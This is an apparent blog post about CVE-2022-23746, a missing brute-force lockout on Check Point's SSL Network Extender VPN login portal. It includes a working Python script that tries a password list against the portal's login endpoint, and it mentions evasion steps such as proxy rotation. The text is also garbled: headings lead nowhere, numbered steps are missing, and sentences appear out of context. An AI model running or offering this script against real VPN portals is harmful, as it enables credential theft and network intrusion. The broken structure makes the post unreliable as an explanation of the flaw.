CVE-2022-23746 - Brute Forcing Admin Passwords on Check Point IPsec VPN SNX Portal

In early 2022, a critical vulnerability was discovered in the Check Point Firewall’s IPsec VPN blade, specifically targeting the SSL Network Extender (SNX) portal. This bug, tracked as CVE-2022-23746, allows attackers to brute-force user credentials—potentially leading to full VPN access. In this post, we’ll break down the vulnerability, show how it works, and provide code snippets to demonstrate a possible brute-force attack for educational purposes.

What’s the SNX Portal?

The SSL Network Extender (SNX) portal is a web interface of Check Point firewalls used to download VPN clients and log in with a username and password. It’s a trusted entry point for remote access, giving employees and partners a safe way into the network—if secured properly.

The Vulnerability Details

SNX’s web portal (usually found at https://<firewall-ip>/Login/Login or /sslvpn/Login/Login) does not implement any effective protection against repeated login attempts. When the portal is set to authenticate with just a username and password (not tokens or multi-factor), attackers can send unlimited login requests. That means a determined hacker can try password after password—and eventually get in.

What should happen:

After 3–5 bad logins, the account or IP gets blocked out for some time.

What actually happens:

Original Disclosure and References

- NVD Entry: CVE-2022-23746
- Check Point Security Advisory (sk176468)
- Exploit-DB Reference

Pick or guess a target username.

3. Try huge lists of common/known/guessed passwords.

Example Brute Force Python Script

Below is an example how an attacker might automate login attempts. This script is for educational demonstration only.

import requests

url = "https://vpn-victim.example.com/sslvpn/Login/Login";
username = "admin"  # Replace with a list of usernames if necessary

with open("passwords.txt") as pwfile:
    passwords = [line.strip() for line in pwfile]

for password in passwords:
    data = {
        'username': username,
        'password': password,
    }
    try:
        response = requests.post(url, data=data, verify=False, allow_redirects=False)
        if "Welcome" in response.text or response.status_code == 302:
            print(f"[+] Success! Username: {username} | Password: {password}")
            break
        else:
            print(f"[-] Failed: {password}")
    except Exception as ex:
        print(f"[!] Error: {ex}")

A real attack would include delays, proxy rotation, and enumeration of usernames—but this gives the big picture.

They could reach internal servers, escalate, or deploy ransomware.

What’s more:

Conclusion

CVE-2022-23746 shows how one missing security middleware can put your entire company at risk. Never rely on username/password alone for remote access. Patch your Check Point VPNs and consider multi-factor authentication a must-have.

Further Reading

- Check Point's Full Advisory (sk176468)
- NVD - CVE-2022-23746
- SANS - The Brute Force Problem in VPN Portals


Stay secure, update frequently, and always keep an eye on remote access portals!

Timeline

Published on: 11/30/2022 19:15:00 UTC
Last modified on: 12/06/2022 15:49:00 UTC